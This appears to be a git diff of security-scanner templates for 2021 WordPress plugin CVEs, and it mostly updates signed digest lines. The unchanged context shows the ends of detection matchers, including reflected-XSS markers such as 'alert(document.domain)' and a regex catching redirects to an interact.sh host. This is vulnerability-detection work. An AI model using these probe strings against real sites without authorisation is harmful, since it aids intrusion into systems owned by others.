digest: 490a004630440220215d77cc7e1fa020ccdb2c632758087f6af702247884f98683b0d26b1e433d9c0220526c7098b978045e4459b7b8bfde3139d05d6bc71d2a04877cc97e16ba2beb7a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200083768a79c57710bcd9663b7ff886692e772389772d43244b23f9726562524e02210084d551ea83e85522e862347bf6bd9c146e5fa16c5928635aaaa8429e5c327e54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24342.yaml b/http/cves/2021/CVE-2021-24342.yaml index fbd075b731..5e3a10d0ac 100644 --- a/http/cves/2021/CVE-2021-24342.yaml +++ b/http/cves/2021/CVE-2021-24342.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022007cc01bdde9e2babb7ae8823608af3d829046e6b4a01475ca517a937149e84ed022028fb0470c9e2f0b2fe678b2e8c74431bc5371828286350d3176fd0720c54cdad:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100883e0eb13316ce50513295777664cc0a4ec490b34071acf12f0a32adb79482d9022100c46cf2def6e6a3bf9658cd1d1fd94ce0386cd9a7a303f39c512a93162ddca423:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24351.yaml b/http/cves/2021/CVE-2021-24351.yaml index 209369b2d4..8f7bbf10ad 100644 --- a/http/cves/2021/CVE-2021-24351.yaml +++ b/http/cves/2021/CVE-2021-24351.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210096455865859e39ebb81e0a23209152d122cad0755bc4300fada5d1ec4954ffee022100df28fd4891faf8dc43f3bb3c25c297f85a93e6653173e8b8e866f1f439c49f57:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022002745978fef9055fa61617d43816795b28062b2d94ce67b929deb12552874e76022100b463808f9b0b201ebe25af86f385eadca7f4632f98f8a00afc618e2304201c46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24358.yaml b/http/cves/2021/CVE-2021-24358.yaml index b3df7d3d49..bd6c1474cc 100644 --- a/http/cves/2021/CVE-2021-24358.yaml +++ b/http/cves/2021/CVE-2021-24358.yaml @@ -58,5 +58,4 @@ http: - 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/' internal: true part: header - -# digest: 4b0a00483046022100d90920d27a1528ecf805c6fe4ddafa40c8b0d82ba902a7f48cb7b609808357e2022100c769ed730e0355ecd034d08090eb6bb4d0445e8b6ab7225df7b43de01fbfbb5f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202aba58fcc488677f5f8a83543f8eb13301872669b41d49c914f08474dfac744f022100f5dc62c53e1e87e8d5958caab34015db03966726e2757647564ced99b78d03e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24364.yaml b/http/cves/2021/CVE-2021-24364.yaml index 5fce7d559a..089ea002cc 100644 --- a/http/cves/2021/CVE-2021-24364.yaml +++ b/http/cves/2021/CVE-2021-24364.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207e2c1c3e1d1dee06e566cdaf55de7b76efb0b3e68c3e7d961c1a48e4cd45ec75022100f10f2e714173e5d789f8c97cb3cfb011cb80da2d6474ead8b6febc46fc5a3903:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f29f82bc09a1032dc9620048bc000e83b6ab7b3f30e3a16a9b9f6aca298a9966022100fa637d0d249b17aa9a461732ca9b8a4c4a5c597399966e8be4db3f69c0b36074:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24370.yaml b/http/cves/2021/CVE-2021-24370.yaml index 37c62f736a..0ad5159325 100644 --- a/http/cves/2021/CVE-2021-24370.yaml +++ b/http/cves/2021/CVE-2021-24370.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c4000a10735826fa76d462d289bc7d6b0d55e06db2a9926c9e1b6dcec00bd402022100cdcdc9823daaef7e3e7c732f4ff9f6547a964b87a4728ccb1d91eb41dd48fdd8:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f549d977e1bca25c25596e0ea6afb8cc9e2bd89b8843d6b3d778cf95a480f1d9022100bef87fee9dd5ef95908d17b1cab3fedc9688aa1578d4f59affce056ba336d339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24387.yaml b/http/cves/2021/CVE-2021-24387.yaml index a219d6693d..9de3d35bb7 100644 --- a/http/cves/2021/CVE-2021-24387.yaml +++ b/http/cves/2021/CVE-2021-24387.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210088d879b1595411b8ebfb26a65a097d39e862f91c8fa433ae1d45ea9f02dc809f022100f5fc36c31699ca845b8c0aa147200511f465e011082145ffc14a25dba08db246:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009a5123d6d182e45eeb6a630381fb4fca1d1825ceed16dc6ed3148a08e57e3d8302210095be4ca3eb33a5d73fe8ec51bd8aa0bd41336fd427d0067ed5972fb81207501c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24389.yaml b/http/cves/2021/CVE-2021-24389.yaml index 1d999b22c3..9f9c18c459 100644 --- a/http/cves/2021/CVE-2021-24389.yaml +++ b/http/cves/2021/CVE-2021-24389.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022062a97762fd69dce9805bdd19573b30a24137e87cab3243b110382cb21128ac0902201b3a1c4f370f10d1f29cb945cc3d469adfd70f71840ac5a3a8a1ce56f50f427c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f4afb68d777a6ed45af355023fdd1d2244475f4f117c9dc6d351e68e7898421e022046a437610d98db9349289ff87d20762d3dac3a8ebfa0461cbe6d5c9d226eaa67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24406.yaml b/http/cves/2021/CVE-2021-24406.yaml index 4e22b9fbce..7e2338e1eb 100644 --- a/http/cves/2021/CVE-2021-24406.yaml +++ b/http/cves/2021/CVE-2021-24406.yaml @@ -35,5 +35,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 4a0a00473045022100f9efa17276e615545cba042881b9e9e79014998a86cc5af0313dc19693b2cdb002203470552598280b917a40a2a1a03f847d6ca3218c91d3b7bbd1bcb0e2214f1eed:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d041de13aa004e05cbcff9720cc0ff76c3ee1fa7cf513d745ed130f3d22d50b7022072c644550f285493096c696cc0fb4b1b9a491a52a9ab4530efea32b6e993d94d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24407.yaml b/http/cves/2021/CVE-2021-24407.yaml index af60f658ef..6302bae211 100644 --- a/http/cves/2021/CVE-2021-24407.yaml +++ b/http/cves/2021/CVE-2021-24407.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a1b769a8e61c4d4f6c5a68b6c0ca396c965b9b8c5ea23c75b46401c417bed79f022100d465ee4bcd12cdc1cd49d5db9b5c9f783ee1841bf8666c8ea7cd9a18f288f9ff:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201e5810bc8b1623df9b76be176714512854d05651bc65ae4475b1c99e17388c300220470089d5b878abf07f07006eff1faa425d07b343778e9b89f50d5b172642f67c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24409.yaml b/http/cves/2021/CVE-2021-24409.yaml index ee0898f240..71b337a7e4 100644 --- a/http/cves/2021/CVE-2021-24409.yaml +++ b/http/cves/2021/CVE-2021-24409.yaml @@ -48,5 +48,4 @@ http: - 'contains(body_2, "Leave A Review?")' - 'contains(body_2, "onanimationend=alert(document.domain)")' condition: and - -# digest: 4a0a00473045022100a05e032a770240b67fb905f7ca493eab372b75ace08a7fd0d36a569b41a46ede022058137e5fac02cf906da2b355bb8603542741c9de9e4f7c04fd00f11d37bde15b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e2b5968ca2991000247f0e7e7a00bb850364e98692393f49fbf4be7ac02b5da1022049a06c7fc87d4884beab85b640feb1fe9e6595af40a8df006bc105243163ac00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24435.yaml b/http/cves/2021/CVE-2021-24435.yaml index 33c9af6941..950f8dc580 100644 --- a/http/cves/2021/CVE-2021-24435.yaml +++ b/http/cves/2021/CVE-2021-24435.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022040f0ead398f02b5dc32bb275f1e9706687ede944f36bd0e132dc4038fbc65a87022022c0e2283021561172edea76aa39ec6ab90c6c4577cac1f41c45d06c7b2870f9:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ba2eb8f6a5b9801ab01c0b73a0d6213b877fee523ab0f6d80941e81c538d53f5022100d5fe4abc304a407981810a2694a282f1948ee5122970207ef52459f23ca26e9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24436.yaml b/http/cves/2021/CVE-2021-24436.yaml index 93917ed33a..fe2390c222 100644 --- a/http/cves/2021/CVE-2021-24436.yaml +++ b/http/cves/2021/CVE-2021-24436.yaml @@ -48,5 +48,4 @@ http: - contains(body_2, '>&action=view') - contains(header_2, "text/html") condition: and - -# digest: 490a0046304402200ec1ee83d9151f5be735146c8486779c73fc7bb108f4124c6bdc8536bcb193d7022075f3c64f89081cab51ab112da2778bd442ea459faca92da28189b3061985fa9b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220073fc3a2eaa15f8134973cf8d95def4957738b86852f8c8a12632584aa3e3f22022100902af83ca45e7f63ee4d30502253bd948f505b7cfa1f36f8ebc764530c2bb1a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24452.yaml b/http/cves/2021/CVE-2021-24452.yaml index 0454093e04..a4882702c5 100644 --- a/http/cves/2021/CVE-2021-24452.yaml +++ b/http/cves/2021/CVE-2021-24452.yaml @@ -47,5 +47,4 @@ http: - contains(body_2, 'extensions/\'-alert(document.domain)-\'') && contains(body_2, 'w3-total-cache') - contains(header_2, "text/html") condition: and - -# digest: 4b0a00483046022100d969c91a007ea92e8bafcce258620c63cc7266a24a256e86467edca931f699d9022100e2d998159f385e5b97e40e852441ebb91503345200c00bbda8572cbc7dd28245:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220578aa79c60b4d1cc136893df0d88bb882fb01b517826d7e1cb5c394023f0579602200dd8a9cb33e7234bbb55b29340a88607e2085f96bbfa250cd68b409a16e3fa14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml index 7f7e2336ec..0eb252f10e 100644 --- a/http/cves/2021/CVE-2021-24472.yaml +++ b/http/cves/2021/CVE-2021-24472.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ea55f007fb59bd7f242455ce24fbb187c047414e7f169ac9196ce65ae20246d6022100d919f969e1a353cb477203a48fef97bb8be3db5bfa531b518c139c20d3d3149a:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fb102be9cd4b42faed038186aad2a7187a452d43a22981bd5541bd42df3f4002022100a66d1c8d1e2f4661225800ccc911e58a673d218bbd6bf359c394eb106a337c8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24488.yaml b/http/cves/2021/CVE-2021-24488.yaml index 0d3baecb5a..841dee281c 100644 --- a/http/cves/2021/CVE-2021-24488.yaml +++ b/http/cves/2021/CVE-2021-24488.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220253f645614365ff414e2517ac05954df8c438bb596f6f9daf073bd93351d5d380221008e828ae7fb23dcb0c90006431d18a8d0b68ab16410fd505e8a1977bc775ccd31:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022029e91fa0f7491515a1fe24d30e5c4e116600f1220965077f645277f1a7e050ce02201b9eeefef57c9c4eb95cd212e4b7fc3fcc31c717ff63f0672abfe475d5a9e1e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24495.yaml b/http/cves/2021/CVE-2021-24495.yaml index 2b4e4077f5..719b720c16 100644 --- a/http/cves/2021/CVE-2021-24495.yaml +++ b/http/cves/2021/CVE-2021-24495.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022017850c310635177e547849da7beb133af5d325c75ceff6a029f162955acf573a0221009c11db3c1ae036f6ed9f039632fba61e466524a9c26c2b800a53732f7678c47a:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220224913fbfe79812723f6c3c9520ff926a2736b836db31dff069f66e5b168171302206f9386d76c364eee916825bdc31bdb38c014db733c726fc0a8ccf645051a05f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24498.yaml b/http/cves/2021/CVE-2021-24498.yaml index 2d4f3bf68e..1c25ccb184 100644 --- a/http/cves/2021/CVE-2021-24498.yaml +++ b/http/cves/2021/CVE-2021-24498.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220030d0701a431c0f1f739d3ffb7737f47f7e8ab9274aa7c13e8f62c7689631cec02205f8206375cf3e72e83b3691ac63f119713197cb8aa8935d08cb83bdd8f01ae35:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202826dc44d99d6edbe8a3bf9c5afffbe6fe254fe55e99df98b5fabb88625d894802204a09e985eac749a47c23627673b0b6b5affdd0fc0143d2fa984155bc31bce387:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24499.yaml b/http/cves/2021/CVE-2021-24499.yaml index 60240ded7c..f6b67472ea 100644 --- a/http/cves/2021/CVE-2021-24499.yaml +++ b/http/cves/2021/CVE-2021-24499.yaml @@ -60,5 +60,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202b788759d01fe74ca52d1bc0609fee084532b968456fa02e55de898fba446810022078ebb9a96731857996bc83d2fa559872c22d8084e1694247872870cb0ec40e06:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204402e4351c96c1c51c0a456543cd76f4c5fdc990035458035a616e96f1f494b0022100c26cd93b90c0c73ae88c20492846f14cb7228b19fb65603503b9c0e5c4a704e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24510.yaml b/http/cves/2021/CVE-2021-24510.yaml index 9f110ebcdb..8b88f9af05 100644 --- a/http/cves/2021/CVE-2021-24510.yaml +++ b/http/cves/2021/CVE-2021-24510.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100b9b0b0eddc120f0709249a4f65d3dbd137ec9b413f794137e202870bafb33050022100f7f07560f38c45d611821245a8a07e801bbbcf432853230e996b9849f3dc5f32:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100abd84486481941d1dddf587affc66888d6223bfa18547026cc038e8aa5939aae0221008806ffccc3b6d293dac0bfaf581bdd66d566b93724e0af254a7682a70c9a103e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24554.yaml b/http/cves/2021/CVE-2021-24554.yaml index bcc2447745..fb0c871223 100644 --- a/http/cves/2021/CVE-2021-24554.yaml +++ b/http/cves/2021/CVE-2021-24554.yaml @@ -51,5 +51,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "paytm-settings_page_wp_paytm_donation")' condition: and - -# digest: 4b0a00483046022100dace29ae17e8224b519547ab2e99eb27b4830e9e2f7beabb6e431b99261bb8b6022100e3022483d55c71d01da98fc49a0302eed2949a1edd3097464605d95882f67836:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100de62c9c2f6c6352eeba57539ef04333f757d76b2de0f253b61aae9489c5aa250022011f3aaa33d6afad8722b42b18cb1326e9c84189e5e5ffa9c6656390bc6718ef5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24627.yaml b/http/cves/2021/CVE-2021-24627.yaml index b32a414d8a..a6da829ed8 100644 --- a/http/cves/2021/CVE-2021-24627.yaml +++ b/http/cves/2021/CVE-2021-24627.yaml @@ -61,5 +61,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022064299d9f86e8f316df313e43fbd85a3d5e836c6901a15f6e6b3f9c6105562197022100dd68cb78a4e95b1ef18494d43d7bbb77044bb1adebcd317228a5a9dcc1b7de99:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a137e34487fca8bfbb5ff0d1383511484c8f6befd8eae7c47469d9d6d00a8c35022100d886f925868307bd47af60274442b8a257101ff303591b615b6d02adb3d7e084:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24647.yaml b/http/cves/2021/CVE-2021-24647.yaml index 0651ae7cae..6e7c4217cc 100644 --- a/http/cves/2021/CVE-2021-24647.yaml +++ b/http/cves/2021/CVE-2021-24647.yaml @@ -51,5 +51,4 @@ http: - 'contains(body_1, "pieregister")' - 'contains(body_3, "Username") && contains(body_3, "email-description")' condition: and - -# digest: 4b0a0048304602210084f86eeb95722e87f7650b814e9a554e0215dec994b47dbc3278700e165249d2022100d7c637a0cc5525f4e56c503e15da615aac6373c31b69c8658557040268bf525b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022022dc1f874d6e04a98b949802037d45ca9ad5ae7ce003ea96012b29c1a73de45d0221008b96117a54791803eb68a0f830e978f1fd0ee3bc7048fd17d509945e2a908d20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24666.yaml b/http/cves/2021/CVE-2021-24666.yaml index 0b12f5923b..0b168aa038 100644 --- a/http/cves/2021/CVE-2021-24666.yaml +++ b/http/cves/2021/CVE-2021-24666.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100862acf0efac2876ee94303f7e6d9113ee8d3f0390c1242baaf9901d87e8fcf6f0220240f5f7ff4986ce8792c4c1d00f03c7e3271ad2d340f1a58fbb20fd0f1e2bc7c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210083c21f06e0caab403cc2655832f92a51c94485c88124d6a4e97425cea3182247022071caf664cdd8e5735a874e65131422c08436648448a32a4dfea038572ffe19be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24731.yaml b/http/cves/2021/CVE-2021-24731.yaml index 5c37eff875..23dbe16977 100644 --- a/http/cves/2021/CVE-2021-24731.yaml +++ b/http/cves/2021/CVE-2021-24731.yaml @@ -45,5 +45,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "User credentials are invalid.")' condition: and - -# digest: 4b0a00483046022100c526a329752a62f57e256d7ea862fd4b839588f12bababae311709f3fde8563c022100dd5020d30856e5b57a1568530c29f3f2eeff08ef2317ef578b8418759f1a586c:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022015c3a7c06e71a4c38ce07cdcde2abc13f2d10eb4b281b2a317e13d478f8f2f40022025e3c006266864500534b5b26c879e6dcf630ffce7ad6f0c113d349e7507286a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24746.yaml b/http/cves/2021/CVE-2021-24746.yaml index 571538cc74..df97d09483 100644 --- a/http/cves/2021/CVE-2021-24746.yaml +++ b/http/cves/2021/CVE-2021-24746.yaml @@ -59,5 +59,4 @@ http: - '"slug":"([_a-z-A-Z0-9]+)",' internal: true part: body - -# digest: 4a0a00473045022037d2b7e23e2e54f3cbdabdfd28bf4e90309d1500695ba3a441d0412a75091a63022100fa0676aee6486e4008f3b702aeb79146d140fbaf9bf1184ecf7169ac87603519:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100df87e57d76e3e7c1b06131e77acd78e07ed5ef724ac729edd6111124c9b38949022009a04678da4f7caeca83c6b988f56e5b6229ecc313cbc90aa8a8c944f34db95e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24750.yaml b/http/cves/2021/CVE-2021-24750.yaml index 605430c088..4d1314753f 100644 --- a/http/cves/2021/CVE-2021-24750.yaml +++ b/http/cves/2021/CVE-2021-24750.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f8879022f54346682b39745fd8291f1099c5a5f438423a3eb789cac885cb5cf1022100e37ea5dfbe9cad3ad43cdf24250d2d22056588af7714279a2020e28b3827a68b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022009af1aa84839362d8e2e20e190abe8cd22a3843a886f1a40cdad144849ecc448022100c13387498799a8f300326a8a2f549ea8b39158a8a2ad85a4c36a7400423373cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24762.yaml b/http/cves/2021/CVE-2021-24762.yaml index 10a8a90b9b..a7064cc762 100644 --- a/http/cves/2021/CVE-2021-24762.yaml +++ b/http/cves/2021/CVE-2021-24762.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 404 - -# digest: 4b0a0048304602210086ed570d48600e8f356651da702e360040f4349b451f83dab2f7e5370e8ea7280221009d4f32a72fbb3a81331d326285427fc2f9288215e609fb6c20942873574dbed5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220746095a77f30bdc9a0bbee6a002b1dda7d37c5c6875585c996ba000078c3e41b022100ce0e6440234d7350f8840e3c5b0eda03ff88045d4e6330794a0bd5687593dd0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24791.yaml b/http/cves/2021/CVE-2021-24791.yaml index d3346b4e71..0be1033210 100644 --- a/http/cves/2021/CVE-2021-24791.yaml +++ b/http/cves/2021/CVE-2021-24791.yaml @@ -50,5 +50,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2,"Add New Snippet")' condition: and - -# digest: 4a0a004730450220171cdd61f439ff219d0d170fb202092ad3e2d9570a30e7088a796ced873e85a302210087e49cc9c534941195183c0570c5834697cf9e46f48d966b948f58570ac14a7f:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206d218a87b6d72d39939d8e824be9d9919ba443410676a06e8d1c8e1efdce7af20220513792ca44a58eecafacdccef4e274f38c3172c130e5996e631785348d40f3d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24827.yaml b/http/cves/2021/CVE-2021-24827.yaml index 4e20ab5df0..420ccdc35c 100644 --- a/http/cves/2021/CVE-2021-24827.yaml +++ b/http/cves/2021/CVE-2021-24827.yaml @@ -44,5 +44,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "asgarosforum")' condition: and - -# digest: 490a00463044022005435fc8f89853c75bb4f713626b59f4bf33d90d7211f055204ce7646ab723b202203c8b740785232bc5763fb6d514d4aedfe189456002374000263f799a2ec7efee:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220698c75d54fc070622867f30230ea1c9fa74dd1c4d4ae00607611b17f41757ee5022050047797db4a1d45e2b5396ef87e9d4f443820a186d2c32bc7e4f659d713cd67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24838.yaml b/http/cves/2021/CVE-2021-24838.yaml index b313806bd1..cb765247ba 100644 --- a/http/cves/2021/CVE-2021-24838.yaml +++ b/http/cves/2021/CVE-2021-24838.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 302 - -# digest: 4a0a004730450220777c67a76188e9f981a06f2e3e7f1b0c7fac6c7d138df4d9f1e4293ab672c599022100c691f8366cfbf8ffc1598c473d6c38b10f156e91297a4c2651c86aad67fbebda:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202fd3373e2e1deb2352f27ad802d6d9e88022a1f7d0de7786fa6bdb559d56dfc5022100805217e36e32ac1833a58f87bd1bba9cabca49557c4900fc3f9252e74e76fb9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24862.yaml b/http/cves/2021/CVE-2021-24862.yaml index 80f34c5de1..d3eb760322 100644 --- a/http/cves/2021/CVE-2021-24862.yaml +++ b/http/cves/2021/CVE-2021-24862.yaml @@ -52,5 +52,4 @@ http: - 'status_code_2 == 200' - 'contains(body_3, "rm_user_role_mananger_form")' condition: and - -# digest: 4a0a004730450220165f15faa1d14101fbcab3b74a577520934c347689d9302d1f0b0320d6e567a6022100f68266bb702562f6bba9b4ff62c761ab3f5d8f91c52e12f5eb363ca9fac9107e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a49741b3cefc857ea461fa768e41e14620bb0541a775d69d58c107f23928656c02210086d08ef0ae8947ce7ccf4a4f7b071469dcb613322134e958d60e72b5339d8bd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24875.yaml b/http/cves/2021/CVE-2021-24875.yaml index 267751e0aa..d716418865 100644 --- a/http/cves/2021/CVE-2021-24875.yaml +++ b/http/cves/2021/CVE-2021-24875.yaml @@ -46,5 +46,4 @@ http: - 'contains(body_2, "alert(document.domain)")' - 'contains(body_2, "eCommerce Product Catalog")' condition: and - -# digest: 4b0a00483046022100a05c0ecad270c9f9de3a31489c7432001e5cde968fdc78b4d8a446ae2a557e95022100aa2e8fee1c5942fd0320f51f5c6cf3674777109e6f95d13ff68b7fddec6bf4ca:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100997dae96c0dfdec7cb1ebaffca4f08bc83363513a8832e43f04738bddfcc39b1022100cffb101da30fe126d6bed6b6a7eb7d5e22820920a1bbbb84701cae7e540071a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml index 1e20f072af..7273283f9c 100644 --- a/http/cves/2021/CVE-2021-24891.yaml +++ b/http/cves/2021/CVE-2021-24891.yaml @@ -57,5 +57,4 @@ http: - type: kval kval: - version - -# digest: 4b0a00483046022100b4e87e6b5547a305a36f8b664db8898272582ebd91c3684c743cfb49f6d625b1022100d5823138f7c9f9bd3ef19fac1d499f594df65493fb6c53efe116cf5f08acc7ee:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009428662e2046bbe6250c000b65b04a25aa9f33b3ccb913252516e646d46b3ce1022072a2d3d16d276cf340ac27e6e08cabc2cee398f739e81a56308bab715b3aa2d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24910.yaml b/http/cves/2021/CVE-2021-24910.yaml index 6638bc909b..ff3254fbe8 100644 --- a/http/cves/2021/CVE-2021-24910.yaml +++ b/http/cves/2021/CVE-2021-24910.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100cdd640220572ac65f78370c0f35d8a6c79e96b4792030f667c88c1bdc6bf6b8502210080c3a9bcf3c80dd0326a10e013beeaa987e183ca9ef18f8d06c1372113fa5d12:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203ed2310906b4b58a9c4a48bab318e23c25dc55d81b584abfdff3ab1e509b63a00220255422235de3ecd5fbe6a98c708dc31b206ec85ff74df853f9b4982c1e690e3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24915.yaml b/http/cves/2021/CVE-2021-24915.yaml index dbee0ffb52..337c9830da 100644 --- a/http/cves/2021/CVE-2021-24915.yaml +++ b/http/cves/2021/CVE-2021-24915.yaml @@ -57,5 +57,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220062ce8e667323ebd4f4b6fa323c22b68f0871c7dbf9e87149a91fdaac2bbb52c0220009c399d5b9bd59be91a43da87e94edfd183a5b31083428ea375d58d0439bf5c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a806870ca68d43f054335630e5fbd4b9167db205e406fb48dc013ab83ad0064c02204ba21ab424824f4a1cb8f4f98bbd66d92aa65782b944e9fd5fbfe86666a1b407:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24917.yaml b/http/cves/2021/CVE-2021-24917.yaml index cd989e6ff1..c324d0cf29 100644 --- a/http/cves/2021/CVE-2021-24917.yaml +++ b/http/cves/2021/CVE-2021-24917.yaml @@ -48,5 +48,4 @@ http: - type: kval kval: - location - -# digest: 4b0a00483046022100d5f64d90657d767856958cf3bd8e8930bb581df20173f7a9e0c9e08b41c211ed022100f933c67b4ee31b1164fdb8f18222f2e961debc6327a777503cf0d84e3a4fcabe:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220329891c77968cee8dd323847047df4798524653fd83b78700351e35718e88148022100a8d6551e685c303a36a0b5e5d6bab17cf6973d22209cef37c1ac81c6b9d7ab9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24926.yaml 